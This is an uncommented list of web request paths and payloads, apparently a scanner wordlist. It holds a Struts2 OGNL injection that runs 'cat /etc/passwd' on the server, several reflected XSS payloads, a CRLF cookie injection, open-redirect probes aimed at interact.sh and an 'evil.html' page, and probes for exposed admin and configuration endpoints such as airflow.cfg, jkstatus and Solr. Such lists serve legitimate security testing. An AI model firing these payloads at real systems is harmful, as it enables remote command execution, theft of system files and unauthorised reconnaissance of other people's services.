/login.action
/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))
/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}
/~user/%0D%0ASet-Cookie:crlfinjection
//interact.sh
/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68
/printenv.shtml?{{url_encode(payload)}}
/ssi/printenv.shtml?{{url_encode(payload)}}
/%5cgoogle.com/evil.html
/http%3A%2F%2Fwww.interact.sh
/kylin/api/admin/config
/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
/admin/
/airflow.cfg
/apache.conf
/conf
/api/v1/cluster/summary
/jkstatus
/jkstatus;
//example.com
/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E
/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E
/api/experimental/latest_runs
/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E
/plugin
/signup
/perl-status
/solr/
/ui/clusters/kafka-ui/brokers
/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp
/lui/
/hub/
/index.action?redirect:http://www.interact.sh/
/solr/admin/metrics
/usr/share/davical/htdocs/setup.php%3f
/html/usr/share/davical/htdocs/setup.php%3f
/usr/share/doc/websocketd/examples/php/dump-env.php%3f
/html/usr/share/doc/websocketd/examples/php/dump-env.php%3f
/appconfigs
:4040/jobs/
/jobs/
/engine-ui/0.0.0.0:4040/environment/
/api/v1/applications
/environment/
